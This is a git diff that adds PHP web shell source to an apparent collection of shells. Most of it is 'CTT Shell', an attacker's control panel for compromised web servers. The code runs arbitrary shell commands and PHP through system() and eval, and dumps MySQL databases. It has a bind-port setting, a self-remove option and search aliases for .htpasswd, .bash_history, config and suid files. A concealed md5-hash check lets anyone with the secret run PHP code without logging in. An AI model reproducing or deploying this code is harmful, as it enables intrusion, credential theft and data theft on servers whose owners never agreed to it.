+"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
+"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
+"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
+"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
+"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
+"/wDchCA97/3IQhB//9k=",
+"pdisk"=>
+"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
+"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
+"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
+"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
+"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
+"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
+"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
+"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
+"odel"=>
+"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+<? // [CT] TEAM SCRIPTING - RODNOC ?>
\ No newline at end of file
diff --git a/138shell/C/ctt_sh.txt b/138shell/C/ctt_sh.txt
new file mode 100644
index 0000000..51ec008
--- /dev/null
+++ b/138shell/C/ctt_sh.txt
@@ -0,0 +1,2927 @@
+<?php
+$timelimit = 60;
+$sul = "?";
+$rd = "./";
+$shver = "0.1";
+$login = "";
+$pass = "";
+$md5_pass = "";
+$login = false;
+$autoupdate = true;
+$updatenow = false;
+$autochmod = 755; 
+$filestealth = 1; 
+$donated_html = "";
+$donated_act = array("");
+$host_allow = array("*");
+$curdir = "./";
+$tmpdir = dirname(__FILE__); 
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
+$quicklaunch1 = array();
+$quicklaunch1[] = array("<b>Ïğîöåññû</b>",$sul."act=ps_aux&d=%d");
+$quicklaunch1[] = array("<b>Ïàğîëè</b>",$sul."act=lsa&d=%d");
+$quicklaunch1[] = array("<b>Êîìàíäû</b>",$sul."act=cmd&d=%d");
+$quicklaunch1[] = array("<b>Çàãğóçêà</b>",$sul."act=upload&d=%d");
+$quicklaunch1[] = array("<b>Áàçà</b>",$sul."act=sql&d=%d");
+$quicklaunch1[] = array("<b>PHP-Êîä</b>",$sul."act=eval&d=%d");
+$quicklaunch1[] = array("<b>PHP-Èíôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch1[] = array("<b>Ñàì óäàëÿşò</b>",$sul."act=selfremove");
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+@$f = $_GET[f];
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
+ header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
+ ctsh_getupdate();
+ $data = file_get_contents($ctsh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("ct_sess_put"))
+{
+function ct_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+$ret = true;
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d.$o)) {unlink($d.$o);}
+else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+  $group['read'].$group['write'].$group['execute'].
+  $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("ctsh_getupdate"))
+{
+function ctsh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($ctsh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+if ($cv < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by ctShell.SQL v. ".$cv."
+# Home page: http://.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+if (!$res) {$ret[err][] = mysql_error();}
+else
+{
+ $row = mysql_fetch_row($res);
+ $out .= $row[1].";\n\n";
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+  while ($row = mysql_fetch_assoc($res))
+  {
+$keys = implode("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode("', '", $values); 
+$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+$out .= $sql;
+  } 
+ }
+}
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+fwrite ($fp, $out);
+fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("ctfsearch"))
+{
+function ctfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+if (is_dir($d.$f))
+{
+ if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+ ctfsearch($d.$f);
+}
+else
+{
+ if ($true)
+ {
+  if (!empty($a[text]))
+  {
+$r = @file_get_contents($d.$f);
+if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+else {$true = strinstr($a[text],$r);}
+if ($a[text_not])
+{
+ if ($true) {$true = false;}
+ else {$true = true;}
+}
+if ($true) {$found[] = $d.$f; $found_f++;}
+  }
+  else {$found[] = $d.$f; $found_f++;}
+ }
+}
+  }
+ }
+ closedir($handle);
+}
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment);
+@ini_set("highlight.default",$highlight_default);
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string","#DD0000"); 
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="Content-Language" content="en-us"><title>
+CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #105019 1px solid;
+BORDER-TOP: #000000 1px solid;
+BORDER-LEFT:#105019 1px solid;
+BORDER-BOTTOM: #105019 1px solid;
+}
+.tr2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.td2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #000000 1px;
+BORDER-TOP: #cccccc 1px;
+BORDER-LEFT:#cccccc 1px;
+BORDER-BOTTOM: #000000 1px;
+font: 7pt Verdana;
+}
+.tds1 {
+BORDER-RIGHT:  #505050 1px solid;
+BORDER-TOP: #505050 1px solid;
+BORDER-LEFT:#505050 1px solid;
+BORDER-BOTTOM: #505050 1px solid;
+font: 8pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #000000;
+}
+.table2 {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT:buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
+A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=JavaScript type=text/javascript> 
+<!-- 
+function branchSwitch(branch) { 
+dom = (document.getElementById); 
+ie4 = (document.all); 
+if (dom || ie4) { 
+var currElement = (dom)? document.getElementById(branch) : document.all[branch]; 
+currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; 
+return false; 
+} 
+else return true; 
+} 
+//--> 
+</script> 
+</head>
+<BODY text=#ffffff  Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center>
+<br>
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> 
+<TBODY><TR> 
+<TD class=td1 colSpan=2> 
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> 
+<TBODY><TR> 
+<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> 
+<TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> 
+<FONT face=Tahoma color=#00ff3d size=1>
+<?
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+?>
+</FONT></SPAN></TD> 
+<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> 
+<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> 
+</TR></TBODY></TABLE></TD></TR> 
+</tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr><td>
+<font size=2><a href="#" onClick="return branchSwitch('tools')" title="ğàñêğûòü">Èíñòğóìåíòû</a></font> - 
+<div id="tools" style="display: none">
+<?
+if (count($quicklaunch1) > 0)
+{
+ foreach($quicklaunch1 as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
